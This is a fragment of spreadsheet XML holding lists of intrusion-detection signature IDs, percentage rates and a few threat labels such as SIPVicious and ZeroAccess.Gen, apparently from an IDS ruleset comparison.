    <t>2, 18, 26, 28, 34799, 2001219, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025712, 2025822, 2027412, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>2, 18, 26, 28, 385, 579, 649, 650, 1010, 1136, 1280, 1413, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 17152, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 23493, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 33561, 34799, 35180, 35193, 35527, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 42016, 42017, 42255, 42340, 43359, 43362, 43496, 43755, 44455, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 50633, 51000, 51127, 51284, 51333, 51344, 57878, 65062</t>
  </si>
  <si>
    <t>2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002826, 2002948, 2003006, 2003068, 2003310, 2008470, 2008578, 2009583, 2009584, 2009767, 2009886, 2009970, 2010518, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2023640, 2024217, 2024930, 2025712, 2025822, 2027412, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100312, 2100385, 2100579, 2100613, 2100628, 2100649, 2100650, 2101280, 2101413, 2101616,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</si>
  <si>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2, 18, 26, 28, 385, 579, 649, 650, 1010, 1136, 1280, 1413, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 17152, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 23493, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 33561, 34799, 35180, 35193, 35527, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 42016, 42017, 42255, 42340, 43359, 43362, 43496, 43755, 44455, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 50633, 51000, 51127, 51284, 51333, 51344, 57878, 65062, 2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002826, 2002948, 2003006, 2003068, 2003310, 2008470, 2008578, 2009583, 2009584, 2009767, 2009886, 2009970, 2010518, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2023640, 2024217, 2024930, 2025712, 2025822, 2027412, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100312, 2100385, 2100579, 2100613, 2100628, 2100649, 2100650, 2101280, 2101413, 2101616,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</si>
  <si>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385, 579, 613, 649, 650, 1010, 1136, 1280, 1413, 1546, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 31136, 42255, 42340</t>
  </si>
  <si>
    <t>2, 18, 26, 28, 385, 579, 613, 649, 650, 1010, 1136, 1280, 1413, 1546, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 31136, 34799, 42255, 42340, 2001219, 2003068, 2008578, 2009099, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2024217, 2025712, 2025822, 2027412, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>64.55%</t>
  </si>
  <si>
    <t>41.82%</t>
  </si>
  <si>
    <t>72.73%</t>
  </si>
  <si>
    <t>87.27%</t>
  </si>
  <si>
    <t>99.09%</t>
  </si>
  <si>
    <t>35.45%</t>
  </si>
  <si>
    <t>76.36%</t>
  </si>
  <si>
    <t>1, 2, 7, 18, 19, 26, 28, 34799, 42944</t>
  </si>
  <si>
    <t>2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2024297, 2025650, 2025712, 2025822, 2027412, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>1, 2, 7, 18, 19, 26, 28, 34799, 42944, 2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2025712, 2025822, 2027412, 2027413, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>1, 2, 4, 5, 7, 18, 19, 26, 28, 254, 385, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 16642, 17152, 17458, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 22097, 23362, 23493, 23861, 24096, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 42016, 42017, 42255, 42340, 42944, 43359, 43362, 43496, 43755, 43808, 44455, 44486, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 65062</t>
  </si>
  <si>
    <t>2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2024217, 2024297, 2024766, 2024930, 2025650, 2025712, 2025822, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100254, 2100312, 2100385, 2100469, 2100472, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101616, 2101620, 2101852,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</si>
  <si>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1, 2, 4, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 254, 385, 579, 649, 650, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 17152, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 23362, 23493, 23861, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 31767, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 41742, 41978, 42016, 42017, 42255, 42340, 42944, 43359, 43362, 43496, 43755, 43808, 44455, 44486, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062, 2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2024217, 2024297, 2024766, 2024930, 2025650, 2025712, 2025822, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100254, 2100312, 2100385, 2100469, 2100472, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101413, 2101418, 2101420, 2101616, 2101620, 2101852,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</si>
  <si>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385, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1546, 1616, 1735, 1852, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 31136, 41978, 42255, 42340, 42944</t>
  </si>
  <si>
    <t>1, 2, 7, 18, 19, 26, 28, 254, 385, 579, 613, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1413, 1417, 1418, 1420, 1421, 1546, 1616, 1735, 1852, 2003, 2004, 2050, 2339, 2418, 2924, 27899, 28555, 28556, 31136, 34799, 42255, 42340, 42944, 2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2025712, 2025822, 2027412, 2027413, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>85.45%</t>
  </si>
  <si>
    <t>2025649, 2025650, 2025992, 2102924</t>
  </si>
  <si>
    <t>42944, 2025649, 2025650, 2025992, 2102924</t>
  </si>
  <si>
    <t>2924, 11192, 13974, 15306, 16418, 28069, 29957, 32481, 40186, 42944, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 57756, 59258</t>
  </si>
  <si>
    <t>2002948, 2003595, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2034857, 2100312, 2102924</t>
  </si>
  <si>
    <t>2924, 11192, 13974, 15306, 16418, 28069, 29957, 32481, 40186, 42944, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 57756, 59258, 2002948, 2003595, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2034857, 2100312, 2102924</t>
  </si>
  <si>
    <t>2924, 42944</t>
  </si>
  <si>
    <t>2924, 42944, 2025649, 2025650, 2025992, 2102924</t>
  </si>
  <si>
    <t>8.18%</t>
  </si>
  <si>
    <t>33.64%</t>
  </si>
  <si>
    <t>38.18%</t>
  </si>
  <si>
    <t>40.00%</t>
  </si>
  <si>
    <t>20.91%</t>
  </si>
  <si>
    <t>45.45%</t>
  </si>
  <si>
    <t>2924, 29957, 32481, 40186, 42944, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 57756</t>
  </si>
  <si>
    <t>2002948, 2003595, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2034857, 2102924</t>
  </si>
  <si>
    <t>2924, 29957, 32481, 40186, 42944, 44484, 44485, 44486, 44487, 44488, 44489, 50447, 50633, 57756, 2002948, 2003595, 2021630, 2022218, 2024766, 2025649, 2025650, 2025992, 2034857, 2102924</t>
  </si>
  <si>
    <t>34799</t>
  </si>
  <si>
    <t>2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2029575, 2102924</t>
  </si>
  <si>
    <t>34799, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2029575, 2102924</t>
  </si>
  <si>
    <t>1735, 2050, 2924, 3679, 4990, 5318, 6699, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 16282, 16301, 16418, 16510, 17494, 18174, 18611, 20566, 23493, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 42255, 43359, 43362, 43755, 44455, 44651, 44679, 47082, 48894, 50633, 51284, 57878</t>
  </si>
  <si>
    <t>2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2009970, 2010518, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2024217, 2024930, 2029575, 2030390, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1735, 2050, 2924, 3679, 4990, 5318, 6699, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 16282, 16301, 16418, 16510, 17494, 18174, 18611, 20566, 23493, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 42255, 43359, 43362, 43755, 44455, 44651, 44679, 47082, 48894, 50633, 51284, 57878, 2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2009970, 2010518, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2024217, 2024930, 2029575, 2030390, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1546, 1735, 2050, 2924, 28555, 31136, 42255</t>
  </si>
  <si>
    <t>1546, 1735, 2050, 2924, 28555, 31136, 34799, 42255, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2029575, 2102924</t>
  </si>
  <si>
    <t>69.09%</t>
  </si>
  <si>
    <t>42.73%</t>
  </si>
  <si>
    <t>34799, 42944</t>
  </si>
  <si>
    <t>2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2024297, 2025650, 2029575, 2102924</t>
  </si>
  <si>
    <t>34799, 41978, 42944, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2024297, 2025650, 2029575, 2102924</t>
  </si>
  <si>
    <t>1735, 2050, 2924, 3679, 4990, 5318, 6699, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 16282, 16301, 16418, 16510, 16642, 17458, 17494, 18174, 18611, 20566, 22097, 23493, 23861, 24096, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 32481, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 42255, 42944, 43359, 43362, 43755, 44455, 44486, 44651, 44679, 47082, 48894, 49040, 50633, 51284, 57756, 57878, 59258</t>
  </si>
  <si>
    <t>2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2009151, 2009970, 2010518, 2010706, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2024217, 2024297, 2024766, 2024930, 2025650, 2029575, 2030390, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1735, 2050, 2924, 3679, 4990, 5318, 6699, 12065, 12066, 12632, 13913, 13974, 14019, 15517, 15850, 16282, 16301, 16418, 16510, 16642, 17458, 17494, 18174, 18611, 20566, 22097, 23493, 23861, 24096, 24889, 26317, 28069, 28313, 28321, 28555, 29509, 29519, 29639, 29957, 30490, 31136, 31399, 32481, 33561, 34799, 35180, 37545, 38038, 38104, 40186, 41186, 42255, 42944, 43359, 43362, 43755, 44455, 44486, 44651, 44679, 47082, 48894, 49040, 50633, 51284, 57756, 57878, 59258, 2001264, 2001353, 2001384, 2001608, 2002948, 2003310, 2003595, 2006409, 2009151, 2009970, 2010518, 2010706, 2011764, 2012063, 2013273, 2015856, 2016662, 2018585, 2021195, 2021630, 2024217, 2024766, 2024930, 2025650, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2100312, 2102924</t>
  </si>
  <si>
    <t>1546, 1735, 2050, 2924, 28555, 31136, 41978, 42255, 42944</t>
  </si>
  <si>
    <t>1546, 1735, 2050, 2924, 28555, 31136, 34799, 41978, 42255, 42944, 2009099, 2012252, 2012647, 2015856, 2018585, 2021195, 2024217, 2025650, 2029575, 2102924</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>23.6484%</t>
  </si>
  <si>
    <t>0.0279%</t>
  </si>
  <si>
    <t>0.0353%</t>
  </si>
  <si>
    <t>76.3516%</t>
  </si>
  <si>
    <t>99.9721%</t>
  </si>
  <si>
    <t>99.9647%</t>
  </si>
  <si>
    <t>5.5952%</t>
  </si>
  <si>
    <t>94.4048%</t>
  </si>
  <si>
    <t>4.3095%</t>
  </si>
  <si>
    <t>5.9978%</t>
  </si>
  <si>
    <t>9.2463%</t>
  </si>
  <si>
    <t>8.7418%</t>
  </si>
  <si>
    <t>7.7712%</t>
  </si>
  <si>
    <t>12.0447%</t>
  </si>
  <si>
    <t>0.0081%</t>
  </si>
  <si>
    <t>9.4936%</t>
  </si>
  <si>
    <t>13.7940%</t>
  </si>
  <si>
    <t>95.6905%</t>
  </si>
  <si>
    <t>94.0022%</t>
  </si>
  <si>
    <t>90.7537%</t>
  </si>
  <si>
    <t>91.2582%</t>
  </si>
  <si>
    <t>92.2288%</t>
  </si>
  <si>
    <t>87.9553%</t>
  </si>
  <si>
    <t>99.9919%</t>
  </si>
  <si>
    <t>90.5064%</t>
  </si>
  <si>
    <t>86.2060%</t>
  </si>
  <si>
    <t>2.1430%</t>
  </si>
  <si>
    <t>0.2593%</t>
  </si>
  <si>
    <t>2.1915%</t>
  </si>
  <si>
    <t>4.9507%</t>
  </si>
  <si>
    <t>3.8278%</t>
  </si>
  <si>
    <t>7.3992%</t>
  </si>
  <si>
    <t>4.9847%</t>
  </si>
  <si>
    <t>6.7428%</t>
  </si>
  <si>
    <t>5.5858%</t>
  </si>
  <si>
    <t>23.2281%</t>
  </si>
  <si>
    <t>0.0336%</t>
  </si>
  <si>
    <t>97.8570%</t>
  </si>
  <si>
    <t>99.7407%</t>
  </si>
  <si>
    <t>97.8085%</t>
  </si>
  <si>
    <t>95.0493%</t>
  </si>
  <si>
    <t>96.1722%</t>
  </si>
  <si>
    <t>92.6008%</t>
  </si>
  <si>
    <t>95.0153%</t>
  </si>
  <si>
    <t>93.2572%</t>
  </si>
  <si>
    <t>94.4142%</t>
  </si>
  <si>
    <t>76.7719%</t>
  </si>
  <si>
    <t>99.9664%</t>
  </si>
  <si>
    <t>0.2148%</t>
  </si>
  <si>
    <t>0.2229%</t>
  </si>
  <si>
    <t>1.3570%</t>
  </si>
  <si>
    <t>0.5358%</t>
  </si>
  <si>
    <t>1.5803%</t>
  </si>
  <si>
    <t>0.0184%</t>
  </si>
  <si>
    <t>0.2319%</t>
  </si>
  <si>
    <t>5.3676%</t>
  </si>
  <si>
    <t>21.8293%</t>
  </si>
  <si>
    <t>0.0000%</t>
  </si>
  <si>
    <t>0.0314%</t>
  </si>
  <si>
    <t>99.7852%</t>
  </si>
  <si>
    <t>99.7771%</t>
  </si>
  <si>
    <t>98.6430%</t>
  </si>
  <si>
    <t>99.4642%</t>
  </si>
  <si>
    <t>98.4197%</t>
  </si>
  <si>
    <t>99.9816%</t>
  </si>
  <si>
    <t>99.7681%</t>
  </si>
  <si>
    <t>94.6324%</t>
  </si>
  <si>
    <t>78.1707%</t>
  </si>
  <si>
    <t>100.0000%</t>
  </si>
  <si>
    <t>99.9686%</t>
  </si>
  <si>
    <t>0.2376%</t>
  </si>
  <si>
    <t>16.7216%</t>
  </si>
  <si>
    <t>99.7624%</t>
  </si>
  <si>
    <t>83.2784%</t>
  </si>
  <si>
    <t>109010003, 9999, DNS, GTPv1, ISF, Microsoft, Non-RFC, SIP, Suspicious</t>
  </si>
  <si>
    <t>0 (0)</t>
  </si>
  <si>
    <t>2 (2)</t>
  </si>
  <si>
    <t>4 (4)</t>
  </si>
  <si>
    <t>8 (8)</t>
  </si>
  <si>
    <t>60.00%</t>
  </si>
  <si>
    <t>58.18%</t>
  </si>
  <si>
    <t>61.82%</t>
  </si>
  <si>
    <t>66.36%</t>
  </si>
  <si>
    <t>67.27%</t>
  </si>
  <si>
    <t>10328, 12766, 17714, 17717, 30703, 32447, 35640, 40774, 42781, 44135, 45650, 47173, 48805, 8912906, 107937801, 108658691, 294191108</t>
  </si>
  <si>
    <t>1, 109010003, DNS, Netis/Netcore, SIP, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>10328, 12766, 17714, 17717, 30703, 32447, 33106, 35640, 40774, 42781, 43796, 43799, 43963, 44135, 45360, 45650, 47173, 48805, 8912906, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>1, 109010003, DNS, Netis/Netcore, RPC, SIP, SIPVicious, Suspicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>12090, 33106, 43796, 43799, 43963, 47173</t>
  </si>
  <si>
    <t>RPC, SIPVicious</t>
  </si>
  <si>
    <t>54.55%</t>
  </si>
  <si>
    <t>30.00%</t>
  </si>
  <si>
    <t>60.91%</t>
  </si>
  <si>
    <t>SIPVicious</t>
  </si>
  <si>
    <t>10328, 12766, 17714, 17717, 30703, 32447, 40774, 42781, 44135, 45650, 47173, 48805, 107937801, 108658691, 294191108</t>
  </si>
  <si>
    <t>DNS, Netis/Netcore, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>10328, 12766, 17714, 17717, 30703, 32447, 33106, 40774, 42781, 43796, 43799, 43963, 44135, 45360, 45650, 47173, 48805, 107937801, 108658691, 110034945, 294191108</t>
  </si>
  <si>
    <t>DNS, Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>56.36%</t>
  </si>
  <si>
    <t>12090, 33106, 43796, 43799, 43963</t>
  </si>
  <si>
    <t>24.55%</t>
  </si>
  <si>
    <t>17717, 30703, 32447, 40774, 42781, 45650</t>
  </si>
  <si>
    <t>Netis/Netcore, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>sip</t>
  </si>
  <si>
    <t>17717, 30703, 32447, 33106, 40774, 42781, 43796, 43799, 43963, 45650</t>
  </si>
  <si>
    <t>Netis/Netcore, RPC, SIPVicious, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>Netis/Netcore, SIPVicious, ZeroAccess.Gen, sip</t>
  </si>
  <si>
    <t>12090, 33106, 43796, 43963</t>
  </si>
  <si>
    <t>17.27%</t>
  </si>
  <si>
    <t>50.00%</t>
  </si>
  <si>
    <t>17717, 32447, 40774, 42781, 45650</t>
  </si>
  <si>
    <t>Netis/Netcore, ZeroAccess.Gen</t>
  </si>
  <si>
    <t>17717, 32447, 33106, 40774, 42781, 43796, 43963, 45650</t>
  </si>
  <si>
    <t>43796, 43963</t>
  </si>
  <si>
    <t>20.00%</t>
  </si>
  <si>
    <t>52.73%</t>
  </si>
  <si>
    <t>15895, 15897, 16001, 16009, 16083, 16195, 16208, 16250, 16270, 16321, 16331, 16492, 17017, 24466, 24473, 25843, 27457, 28198, 28877, 30061, 31077, 31349, 31755, 32304, 33053, 33704, 34050, 34527, 34640, 34789, 35824, 38131, 40503, 41469, 41470, 41475, 42533, 42537, 42662, 42670, 43349, 44611, 44623, 52452, 57032, 60856</t>
  </si>
  <si>
    <t>17717, 32447, 40774, 42781</t>
  </si>
  <si>
    <t>77.27%</t>
  </si>
  <si>
    <t>4 (6)</t>
  </si>
  <si>
    <t>1, 2, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 34799, 41978, 42944</t>
  </si>
  <si>
    <t>2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2024297, 2025649, 2025650, 2025712, 2025822, 2025992, 2027412, 2027413, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>1, 2, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 34799, 41978, 42944, 2001219, 2002911, 2003068, 2008578, 2009099, 2010935, 2010936, 2010937, 2010938, 2010939, 2011716, 2012252, 2012296, 2012647, 2014380, 2015856, 2016683, 2016778, 2018585, 2019102, 2019401, 2021195, 2023640, 2023753, 2024217, 2024297, 2025649, 2025650, 2025712, 2025822, 2025992, 2027412, 2027413, 2027757, 2029340, 2029575, 2053892, 2053893, 2100579, 2101280, 2101411, 2101413, 2101616, 2102003, 2102924</t>
  </si>
  <si>
    <t>1, 2, 4, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 254, 385, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11192, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 16642, 17152, 17458, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 22097, 23362, 23493, 23861, 24096, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 31767, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 41742, 41978, 42016, 42017, 42255, 42340, 42944, 43359, 43362, 43496, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062</t>
  </si>
  <si>
    <t>2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002749, 2002752, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 2023640, 2023753, 2024217, 2024297, 2024766, 2024930, 2025649, 2025650, 2025712, 2025822, 2025992, 2027412, 2027413, 2027757, 2027759, 2027865, 2029340, 2029575, 2030390, 2034857, 2036751, 2045173, 2049956, 2049957, 2053892, 2053893, 2100254, 2100312, 2100385, 2100469, 2100472, 2100527, 2100579, 2100613, 2100615, 2100628, 2100649, 2100650, 2101280, 2101411, 2101413, 2101417, 2101418, 2101420, 2101616, 2101620, 2101852,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</si>
  <si>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1, 2, 4, 5, 7, 12, 14, 15, 18, 19, 20, 26, 28, 254, 385, 579, 649, 650, 853, 882, 895, 1010, 1136, 1201, 1280, 1394, 1411, 1413, 1417, 1418, 1420, 1421, 1616, 1735, 2003, 2004, 2050, 2339, 2418, 2924, 3679, 4990, 5318, 6699, 11192, 11263, 12065, 12066, 12632, 13913, 13974, 14019, 15306, 15517, 15850, 15873, 16282, 16301, 16418, 16510, 16642, 17152, 17458, 17494, 18174, 18611, 20212, 20528, 20566, 21214, 22097, 23362, 23493, 23861, 24096, 24889, 25664, 26317, 26989, 27899, 27938, 28069, 28313, 28321, 28555, 28556, 28993, 29456, 29509, 29519, 29639, 29957, 30342, 30490, 31136, 31212, 31341, 31399, 31767, 32481, 33561, 34799, 35180, 35193, 35527, 36650, 37545, 38038, 38104, 38381, 39320, 40186, 41186, 41742, 41978, 42016, 42017, 42255, 42340, 42944, 43359, 43362, 43496, 43755, 43808, 44455, 44484, 44485, 44486, 44487, 44488, 44489, 44651, 44679, 45578, 45941, 46373, 47082, 48134, 48326, 48331, 48894, 49040, 50447, 50633, 51000, 51127, 51284, 51333, 51344, 57756, 57878, 59258, 59597, 65062, 2000537, 2000538, 2000545, 2001219, 2001264, 2001353, 2001384, 2001608, 2002749, 2002752, 2002826, 2002948, 2003006, 2003012, 2003020, 2003068, 2003099, 2003310, 2003595, 2006408, 2006409, 2008470, 2008578, 2009151, 2009205, 2009206, 2009207, 2009208, 2009582, 2009583, 2009584, 2009767, 2009768, 2009886, 2009970, 2010518, 2010706, 2010935, 2010936, 2010937, 2010938, 2010939, 2011368, 2011408, 2011411, 2011716, 2011764, 2012063, 2012296, 2013273, 2014380, 2014384, 2015856, 2016662, 2016683, 2016778, 2018585, 2019102, 2019401, 2020632, 2021195, 2021630, 2022218, 